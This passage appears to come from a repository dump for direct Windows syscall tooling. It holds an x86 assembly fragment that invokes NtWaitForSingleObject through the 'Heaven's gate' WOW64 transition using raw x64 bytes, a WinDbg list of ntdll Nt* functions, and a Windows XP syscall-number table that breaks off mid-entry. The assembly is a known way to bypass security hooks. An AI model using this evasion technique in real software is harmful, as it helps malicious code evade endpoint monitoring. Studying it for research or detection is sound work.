mov eax, [edi] ; NtWaitForSingleObject syscall call ourSyscall mov edi, [esp+0xc] jmp end ourSyscall: ; Syscall Function push 0x33 ; Push 0x33 selector for 64-bit call nextRetf ; GetPC nextRetf: add [esp], 5 ; Create destination for Heaven's gate retf ; Invoke Heaven's gate--transition to x64 code db 0x49,0x87,0xe6,0x45,0x8b,0x06,0x49,0x83,0xc6,0x04,0x45,0x89,0x45,0x3c,0x45,0x89,0x75,0x48,0x49, 0x83,0xee,0x04,0x4d,0x8d,0x5e,0x04,0x41,0x89,0x7d,0x20,0x41,0x89,0x75,0x24,0x41,0x89,0x5d,0x28,0x41, 0x89,0x6d,0x38,0x9c,0x41,0x58,0x45,0x89,0x45,0x44,0x89,0xc1,0xc1,0xe9,0x10,0x41,0xff,0x24,0xcf ; x64 code as bytes, leading to syscall ; xchg rsp,r14 ; mov r8d,dword ptr [r14] ; add r14,4 ; mov dword ptr [r13+3Ch],r8d # Save x86 EIP ; mov dword ptr [r13+48h],r14d # Save x86 ESP ; sub r14,4 ; lea r11,[r14+4] # Pointer to syscall args ; mov dword ptr [r13+20h],edi # Save 32-bit registers ; mov dword ptr [r13+24h],esi # into WOW64_CONTEXT ; mov dword ptr [r13+28h],ebx ; mov dword ptr [r13+38h],ebp ; pushfq ; pop r8 # Save x86 EFlags ; mov dword ptr [r13+44h],r8d ; mov ecx,eax ; shr ecx,10h # Get TurboThunk, if needed ; jmp qword ptr [r15+rcx*8] end: nop ================================================ FILE: start/WinDbgList.txt ================================================ winDbgList u ntdll!NtAccessCheck L2 u ntdll!NtAccessCheckAndAuditAlarm L2 u ntdll!NtAccessCheckByType L2 u ntdll!NtAccessCheckByTypeAndAuditAlarm L2 u ntdll!NtAccessCheckByTypeResultList L2 u ntdll!NtAccessCheckByTypeResultListAndAuditAlarm L2 u ntdll!NtAccessCheckByTypeResultListAndAuditAlarmByHandle L2 u ntdll!NtAcquireCrossVmMutant L2 u ntdll!NtAcquireProcessActivityReference L2 u ntdll!NtAddAtom L2 u ntdll!NtAddAtomEx L2 u ntdll!NtAddBootEntry L2 u ntdll!NtAddDriverEntry L2 u ntdll!NtAdjustGroupsToken L2 u ntdll!NtAdjustPrivilegesToken L2 u ntdll!NtAdjustTokenClaimsAndDeviceGroups L2 u ntdll!NtAlertResumeThread L2 u ntdll!NtAlertThread L2 u ntdll!NtAlertThreadByThreadId L2 u ntdll!NtAllocateLocallyUniqueId L2 u ntdll!NtAllocateReserveObject L2 u ntdll!NtAllocateUserPhysicalPages L2 u ntdll!NtAllocateUserPhysicalPagesEx L2 u ntdll!NtAllocateUuids L2 u ntdll!NtAllocateVirtualMemory L2 u ntdll!NtAllocateVirtualMemoryEx L2 u ntdll!NtAlpcAcceptConnectPort L2 u ntdll!NtAlpcCancelMessage L2 u ntdll!NtAlpcConnectPort L2 u ntdll!NtAlpcConnectPortEx L2 u ntdll!NtAlpcCreatePort L2 u ntdll!NtAlpcCreatePortSection L2 u ntdll!NtAlpcCreateResourceReserve L2 u ntdll!NtAlpcCreateSectionView L2 u ntdll!NtAlpcCreateSecurityContext L2 u ntdll!NtAlpcDeletePortSection L2 u ntdll!NtAlpcDeleteResourceReserve L2 u ntdll!NtAlpcDeleteSectionView L2 u ntdll!NtAlpcDeleteSecurityContext L2 u ntdll!NtAlpcDisconnectPort L2 u ntdll!NtAlpcImpersonateClientContainerOfPort L2 u ntdll!NtAlpcImpersonateClientOfPort L2 u ntdll!NtAlpcOpenSenderProcess L2 u ntdll!NtAlpcOpenSenderThread L2 u ntdll!NtAlpcQueryInformation L2 u ntdll!NtAlpcQueryInformationMessage L2 u ntdll!NtAlpcRevokeSecurityContext L2 u ntdll!NtAlpcSendWaitReceivePort L2 u ntdll!NtAlpcSetInformation L2 u ntdll!NtApphelpCacheControl L2 u ntdll!NtAreMappedFilesTheSame L2 u ntdll!NtAssignProcessToJobObject L2 u ntdll!NtAssociateWaitCompletionPacket L2 u ntdll!NtCallEnclave L2 u ntdll!NtCallbackReturn L2 u ntdll!NtCancelIoFile L2 u ntdll!NtCancelIoFileEx L2 u ntdll!NtCancelSynchronousIoFile L2 u ntdll!NtCancelTimer L2 u ntdll!NtCancelTimer2 L2 u ntdll!NtCancelWaitCompletionPacket L2 u ntdll!NtChangeProcessState L2 u ntdll!NtChangeThreadState L2 u ntdll!NtClearEvent L2 u ntdll!NtClose L2 u ntdll!NtCloseObjectAuditAlarm L2 u ntdll!NtCommitComplete L2 u ntdll!NtCommitEnlistment L2 u ntdll!NtCommitRegistryTransaction L2 u ntdll!NtCommitTransaction L2 u ntdll!NtCompactKeys L2 u ntdll!NtCompareObjects L2 u ntdll!NtCompareSigningLevels L2 u ntdll!NtCompareTokens L2 u ntdll!NtCompleteConnectPort L2 u ntdll!NtCompressKey L2 u ntdll!NtConnectPort L2 u ntdll!NtContinue L2 u ntdll!NtContinueEx L2 u ntdll!NtConvertBetweenAuxiliaryCounterAndPerformanceCounter L2 u ntdll!NtCreateCrossVmEvent L2 u ntdll!NtCreateCrossVmMutant L2 u ntdll!NtCreateDebugObject L2 u ntdll!NtCreateDirectoryObject L2 u ntdll!NtCreateDirectoryObjectEx L2 u ntdll!NtCreateEnclave L2 u ntdll!NtCreateEnlistment L2 u ntdll!NtCreateEvent L2 u ntdll!NtCreateEventPair L2 u ntdll!NtCreateFile L2 u ntdll!NtCreateIRTimer L2 u ntdll!NtCreateIoCompletion L2 u ntdll!NtCreateIoRing L2 u ntdll!NtCreateJobObject L2 u ntdll!NtCreateJobSet L2 u ntdll!NtCreateKey L2 u ntdll!NtCreateKeyTransacted L2 u ntdll!NtCreateKeyedEvent L2 u ntdll!NtCreateLowBoxToken L2 u ntdll!NtCreateMailslotFile L2 u ntdll!NtCreateMutant L2 u ntdll!NtCreateNamedPipeFile L2 u ntdll!NtCreatePagingFile L2 u ntdll!NtCreatePartition L2 u ntdll!NtCreatePort L2 u ntdll!NtCreatePrivateNamespace L2 u ntdll!NtCreateProcess L2 u ntdll!NtCreateProcessEx L2 u ntdll!NtCreateProcessStateChange L2 u ntdll!NtCreateProfile L2 u ntdll!NtCreateProfileEx L2 u ntdll!NtCreateRegistryTransaction L2 u ntdll!NtCreateResourceManager L2 u ntdll!NtCreateSection L2 u ntdll!NtCreateSectionEx L2 u ntdll!NtCreateSemaphore L2 u ntdll!NtCreateSymbolicLinkObject L2 u ntdll!NtCreateThread L2 u ntdll!NtCreateThreadEx L2 u ntdll!NtCreateThreadStateChange L2 u ntdll!NtCreateTimer L2 u ntdll!NtCreateTimer2 L2 u ntdll!NtCreateToken L2 u ntdll!NtCreateTokenEx L2 u ntdll!NtCreateTransaction L2 u ntdll!NtCreateTransactionManager L2 u ntdll!NtCreateUserProcess L2 u ntdll!NtCreateWaitCompletionPacket L2 u ntdll!NtCreateWaitablePort L2 u ntdll!NtCreateWnfStateName L2 u ntdll!NtCreateWorkerFactory L2 u ntdll!NtDebugActiveProcess L2 u ntdll!NtDebugContinue L2 u ntdll!NtDelayExecution L2 u ntdll!NtDeleteAtom L2 u ntdll!NtDeleteBootEntry L2 u ntdll!NtDeleteDriverEntry L2 u ntdll!NtDeleteFile L2 u ntdll!NtDeleteKey L2 u ntdll!NtDeleteObjectAuditAlarm L2 u ntdll!NtDeletePrivateNamespace L2 u ntdll!NtDeleteValueKey L2 u ntdll!NtDeleteWnfStateData L2 u ntdll!NtDeleteWnfStateName L2 u ntdll!NtDeviceIoControlFile L2 u ntdll!NtDirectGraphicsCall L2 u ntdll!NtDisableLastKnownGood L2 u ntdll!NtDisplayString L2 u ntdll!NtDrawText L2 u ntdll!NtDuplicateObject L2 u ntdll!NtDuplicateToken L2 u ntdll!NtEnableLastKnownGood L2 u ntdll!NtEnumerateBootEntries L2 u ntdll!NtEnumerateDriverEntries L2 u ntdll!NtEnumerateKey L2 u ntdll!NtEnumerateSystemEnvironmentValuesEx L2 u ntdll!NtEnumerateTransactionObject L2 u ntdll!NtEnumerateValueKey L2 u ntdll!NtExtendSection L2 u ntdll!NtFilterBootOption L2 u ntdll!NtFilterToken L2 u ntdll!NtFilterTokenEx L2 u ntdll!NtFindAtom L2 u ntdll!NtFlushBuffersFile L2 u ntdll!NtFlushBuffersFileEx L2 u ntdll!NtFlushInstallUILanguage L2 u ntdll!NtFlushInstructionCache L2 u ntdll!NtFlushKey L2 u ntdll!NtFlushProcessWriteBuffers L2 u ntdll!NtFlushVirtualMemory L2 u ntdll!NtFlushWriteBuffer L2 u ntdll!NtFreeUserPhysicalPages L2 u ntdll!NtFreeVirtualMemory L2 u ntdll!NtFreezeRegistry L2 u ntdll!NtFreezeTransactions L2 u ntdll!NtFsControlFile L2 u ntdll!NtGetCachedSigningLevel L2 u ntdll!NtGetCompleteWnfStateSubscription L2 u ntdll!NtGetContextThread L2 u ntdll!NtGetCurrentProcessorNumber L2 u ntdll!NtGetCurrentProcessorNumberEx L2 u ntdll!NtGetDevicePowerState L2 u ntdll!NtGetMUIRegistryInfo L2 u ntdll!NtGetNextProcess L2 u ntdll!NtGetNextThread L2 u ntdll!NtGetNlsSectionPtr L2 u ntdll!NtGetNotificationResourceManager L2 u ntdll!NtGetWriteWatch L2 u ntdll!NtImpersonateAnonymousToken L2 u ntdll!NtImpersonateClientOfPort L2 u ntdll!NtImpersonateThread L2 u ntdll!NtInitializeEnclave L2 u ntdll!NtInitializeNlsFiles L2 u ntdll!NtInitializeRegistry L2 u ntdll!NtInitiatePowerAction L2 u ntdll!NtIsProcessInJob L2 u ntdll!NtIsSystemResumeAutomatic L2 u ntdll!NtIsUILanguageComitted L2 u ntdll!NtListenPort L2 u ntdll!NtLoadDriver L2 u ntdll!NtLoadEnclaveData L2 u ntdll!NtLoadKey L2 u ntdll!NtLoadKey2 L2 u ntdll!NtLoadKey3 L2 u ntdll!NtLoadKeyEx L2 u ntdll!NtLockFile L2 u ntdll!NtLockProductActivationKeys L2 u ntdll!NtLockRegistryKey L2 u ntdll!NtLockVirtualMemory L2 u ntdll!NtMakePermanentObject L2 u ntdll!NtMakeTemporaryObject L2 u ntdll!NtManageHotPatch L2 u ntdll!NtManagePartition L2 u ntdll!NtMapCMFModule L2 u ntdll!NtMapUserPhysicalPages L2 u ntdll!NtMapUserPhysicalPagesScatter L2 u ntdll!NtMapViewOfSection L2 u ntdll!NtMapViewOfSectionEx L2 u ntdll!NtModifyBootEntry L2 u ntdll!NtModifyDriverEntry L2 u ntdll!NtNotifyChangeDirectoryFile L2 u ntdll!NtNotifyChangeDirectoryFileEx L2 u ntdll!NtNotifyChangeKey L2 u ntdll!NtNotifyChangeMultipleKeys L2 u ntdll!NtNotifyChangeSession L2 u ntdll!NtOpenDirectoryObject L2 u ntdll!NtOpenEnlistment L2 u ntdll!NtOpenEvent L2 u ntdll!NtOpenEventPair L2 u ntdll!NtOpenFile L2 u ntdll!NtOpenIoCompletion L2 u ntdll!NtOpenJobObject L2 u ntdll!NtOpenKey L2 u ntdll!NtOpenKeyEx L2 u ntdll!NtOpenKeyTransacted L2 u ntdll!NtOpenKeyTransactedEx L2 u ntdll!NtOpenKeyedEvent L2 u ntdll!NtOpenMutant L2 u ntdll!NtOpenObjectAuditAlarm L2 u ntdll!NtOpenPartition L2 u ntdll!NtOpenPrivateNamespace L2 u ntdll!NtOpenProcess L2 u ntdll!NtOpenProcessToken L2 u ntdll!NtOpenProcessTokenEx L2 u ntdll!NtOpenRegistryTransaction L2 u ntdll!NtOpenResourceManager L2 u ntdll!NtOpenSection L2 u ntdll!NtOpenSemaphore L2 u ntdll!NtOpenSession L2 u ntdll!NtOpenSymbolicLinkObject L2 u ntdll!NtOpenThread L2 u ntdll!NtOpenThreadToken L2 u ntdll!NtOpenThreadTokenEx L2 u ntdll!NtOpenTimer L2 u ntdll!NtOpenTransaction L2 u ntdll!NtOpenTransactionManager L2 u ntdll!NtPlugPlayControl L2 u ntdll!NtPowerInformation L2 u ntdll!NtPrePrepareComplete L2 u ntdll!NtPrePrepareEnlistment L2 u ntdll!NtPrepareComplete L2 u ntdll!NtPrepareEnlistment L2 u ntdll!NtPrivilegeCheck L2 u ntdll!NtPrivilegeObjectAuditAlarm L2 u ntdll!NtPrivilegedServiceAuditAlarm L2 u ntdll!NtPropagationComplete L2 u ntdll!NtPropagationFailed L2 u ntdll!NtProtectVirtualMemory L2 u ntdll!NtPssCaptureVaSpaceBulk L2 u ntdll!NtPulseEvent L2 u ntdll!NtQueryAttributesFile L2 u ntdll!NtQueryAuxiliaryCounterFrequency L2 u ntdll!NtQueryBootEntryOrder L2 u ntdll!NtQueryBootOptions L2 u ntdll!NtQueryDebugFilterState L2 u ntdll!NtQueryDefaultLocale L2 u ntdll!NtQueryDefaultUILanguage L2 u ntdll!NtQueryDirectoryFile L2 u ntdll!NtQueryDirectoryFileEx L2 u ntdll!NtQueryDirectoryObject L2 u ntdll!NtQueryDriverEntryOrder L2 u ntdll!NtQueryEaFile L2 u ntdll!NtQueryEvent L2 u ntdll!NtQueryFullAttributesFile L2 u ntdll!NtQueryInformationAtom L2 u ntdll!NtQueryInformationByName L2 u ntdll!NtQueryInformationEnlistment L2 u ntdll!NtQueryInformationFile L2 u ntdll!NtQueryInformationJobObject L2 u ntdll!NtQueryInformationPort L2 u ntdll!NtQueryInformationProcess L2 u ntdll!NtQueryInformationResourceManager L2 u ntdll!NtQueryInformationThread L2 u ntdll!NtQueryInformationToken L2 u ntdll!NtQueryInformationTransaction L2 u ntdll!NtQueryInformationTransactionManager L2 u ntdll!NtQueryInformationWorkerFactory L2 u ntdll!NtQueryInstallUILanguage L2 u ntdll!NtQueryIntervalProfile L2 u ntdll!NtQueryIoCompletion L2 u ntdll!NtQueryIoRingCapabilities L2 u ntdll!NtQueryKey L2 u ntdll!NtQueryLicenseValue L2 u ntdll!NtQueryMultipleValueKey L2 u ntdll!NtQueryMutant L2 u ntdll!NtQueryObject L2 u ntdll!NtQueryOpenSubKeys L2 u ntdll!NtQueryOpenSubKeysEx L2 u ntdll!NtQueryPerformanceCounter L2 u ntdll!NtQueryPortInformationProcess L2 u ntdll!NtQueryQuotaInformationFile L2 u ntdll!NtQuerySection L2 u ntdll!NtQuerySecurityAttributesToken L2 u ntdll!NtQuerySecurityObject L2 u ntdll!NtQuerySecurityPolicy L2 u ntdll!NtQuerySemaphore L2 u ntdll!NtQuerySymbolicLinkObject L2 u ntdll!NtQuerySystemEnvironmentValue L2 u ntdll!NtQuerySystemEnvironmentValueEx L2 u ntdll!NtQuerySystemInformation L2 u ntdll!NtQuerySystemInformationEx L2 u ntdll!NtQueryTimer L2 u ntdll!NtQueryTimerResolution L2 u ntdll!NtQueryValueKey L2 u ntdll!NtQueryVirtualMemory L2 u ntdll!NtQueryVolumeInformationFile L2 u ntdll!NtQueryWnfStateData L2 u ntdll!NtQueryWnfStateNameInformation L2 u ntdll!NtQueueApcThread L2 u ntdll!NtQueueApcThreadEx L2 u ntdll!NtQueueApcThreadEx2 L2 u ntdll!NtRaiseException L2 u ntdll!NtRaiseHardError L2 u ntdll!NtReadFile L2 u ntdll!NtReadFileScatter L2 u ntdll!NtReadOnlyEnlistment L2 u ntdll!NtReadRequestData L2 u ntdll!NtReadVirtualMemory L2 u ntdll!NtReadVirtualMemoryEx L2 u ntdll!NtRecoverEnlistment L2 u ntdll!NtRecoverResourceManager L2 u ntdll!NtRecoverTransactionManager L2 u ntdll!NtRegisterProtocolAddressInformation L2 u ntdll!NtRegisterThreadTerminatePort L2 u ntdll!NtReleaseKeyedEvent L2 u ntdll!NtReleaseMutant L2 u ntdll!NtReleaseSemaphore L2 u ntdll!NtReleaseWorkerFactoryWorker L2 u ntdll!NtRemoveIoCompletion L2 u ntdll!NtRemoveIoCompletionEx L2 u ntdll!NtRemoveProcessDebug L2 u ntdll!NtRenameKey L2 u ntdll!NtRenameTransactionManager L2 u ntdll!NtReplaceKey L2 u ntdll!NtReplacePartitionUnit L2 u ntdll!NtReplyPort L2 u ntdll!NtReplyWaitReceivePort L2 u ntdll!NtReplyWaitReceivePortEx L2 u ntdll!NtReplyWaitReplyPort L2 u ntdll!NtRequestPort L2 u ntdll!NtRequestWaitReplyPort L2 u ntdll!NtResetEvent L2 u ntdll!NtResetWriteWatch L2 u ntdll!NtRestoreKey L2 u ntdll!NtResumeProcess L2 u ntdll!NtResumeThread L2 u ntdll!NtRevertContainerImpersonation L2 u ntdll!NtRollbackComplete L2 u ntdll!NtRollbackEnlistment L2 u ntdll!NtRollbackRegistryTransaction L2 u ntdll!NtRollbackTransaction L2 u ntdll!NtRollforwardTransactionManager L2 u ntdll!NtSaveKey L2 u ntdll!NtSaveKeyEx L2 u ntdll!NtSaveMergedKeys L2 u ntdll!NtSecureConnectPort L2 u ntdll!NtSerializeBoot L2 u ntdll!NtSetBootEntryOrder L2 u ntdll!NtSetBootOptions L2 u ntdll!NtSetCachedSigningLevel L2 u ntdll!NtSetCachedSigningLevel2 L2 u ntdll!NtSetContextThread L2 u ntdll!NtSetDebugFilterState L2 u ntdll!NtSetDefaultHardErrorPort L2 u ntdll!NtSetDefaultLocale L2 u ntdll!NtSetDefaultUILanguage L2 u ntdll!NtSetDriverEntryOrder L2 u ntdll!NtSetEaFile L2 u ntdll!NtSetEvent L2 u ntdll!NtSetEventBoostPriority L2 u ntdll!NtSetHighEventPair L2 u ntdll!NtSetHighWaitLowEventPair L2 u ntdll!NtSetIRTimer L2 u ntdll!NtSetInformationDebugObject L2 u ntdll!NtSetInformationEnlistment L2 u ntdll!NtSetInformationFile L2 u ntdll!NtSetInformationIoRing L2 u ntdll!NtSetInformationJobObject L2 u ntdll!NtSetInformationKey L2 u ntdll!NtSetInformationObject L2 u ntdll!NtSetInformationProcess L2 u ntdll!NtSetInformationResourceManager L2 u ntdll!NtSetInformationSymbolicLink L2 u ntdll!NtSetInformationThread L2 u ntdll!NtSetInformationToken L2 u ntdll!NtSetInformationTransaction L2 u ntdll!NtSetInformationTransactionManager L2 u ntdll!NtSetInformationVirtualMemory L2 u ntdll!NtSetInformationWorkerFactory L2 u ntdll!NtSetIntervalProfile L2 u ntdll!NtSetIoCompletion L2 u ntdll!NtSetIoCompletionEx L2 u ntdll!NtSetLdtEntries L2 u ntdll!NtSetLowEventPair L2 u ntdll!NtSetLowWaitHighEventPair L2 u ntdll!NtSetQuotaInformationFile L2 u ntdll!NtSetSecurityObject L2 u ntdll!NtSetSystemEnvironmentValue L2 u ntdll!NtSetSystemEnvironmentValueEx L2 u ntdll!NtSetSystemInformation L2 u ntdll!NtSetSystemPowerState L2 u ntdll!NtSetSystemTime L2 u ntdll!NtSetThreadExecutionState L2 u ntdll!NtSetTimer L2 u ntdll!NtSetTimer2 L2 u ntdll!NtSetTimerEx L2 u ntdll!NtSetTimerResolution L2 u ntdll!NtSetUuidSeed L2 u ntdll!NtSetValueKey L2 u ntdll!NtSetVolumeInformationFile L2 u ntdll!NtSetWnfProcessNotificationEvent L2 u ntdll!NtShutdownSystem L2 u ntdll!NtShutdownWorkerFactory L2 u ntdll!NtSignalAndWaitForSingleObject L2 u ntdll!NtSinglePhaseReject L2 u ntdll!NtStartProfile L2 u ntdll!NtStopProfile L2 u ntdll!NtSubmitIoRing L2 u ntdll!NtSubscribeWnfStateChange L2 u ntdll!NtSuspendProcess L2 u ntdll!NtSuspendThread L2 u ntdll!NtSystemDebugControl L2 u ntdll!NtTerminateEnclave L2 u ntdll!NtTerminateJobObject L2 u ntdll!NtTerminateProcess L2 u ntdll!NtTerminateThread L2 u ntdll!NtTestAlert L2 u ntdll!NtThawRegistry L2 u ntdll!NtThawTransactions L2 u ntdll!NtTraceControl L2 u ntdll!NtTraceEvent L2 u ntdll!NtTranslateFilePath L2 u ntdll!NtUmsThreadYield L2 u ntdll!NtUnloadDriver L2 u ntdll!NtUnloadKey L2 u ntdll!NtUnloadKey2 L2 u ntdll!NtUnloadKeyEx L2 u ntdll!NtUnlockFile L2 u ntdll!NtUnlockVirtualMemory L2 u ntdll!NtUnmapViewOfSection L2 u ntdll!NtUnmapViewOfSectionEx L2 u ntdll!NtUnsubscribeWnfStateChange L2 u ntdll!NtUpdateWnfStateData L2 u ntdll!NtVdmControl L2 u ntdll!NtWaitForAlertByThreadId L2 u ntdll!NtWaitForDebugEvent L2 u ntdll!NtWaitForKeyedEvent L2 u ntdll!NtWaitForMultipleObjects L2 u ntdll!NtWaitForMultipleObjects32 L2 u ntdll!NtWaitForSingleObject L2 u ntdll!NtWaitForWorkViaWorkerFactory L2 u ntdll!NtWaitHighEventPair L2 u ntdll!NtWaitLowEventPair L2 u ntdll!NtWorkerFactoryWorkerReady L2 u ntdll!NtWriteFile L2 u ntdll!NtWriteFileGather L2 u ntdll!NtWriteRequestData L2 u ntdll!NtWriteVirtualMemory L2 u ntdll!NtYieldExecution L2 u ntdll!RtlGetNativeSystemInformation L2 ================================================ FILE: start/WinSysCalls.json ================================================ {"Windows XP": {"SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": 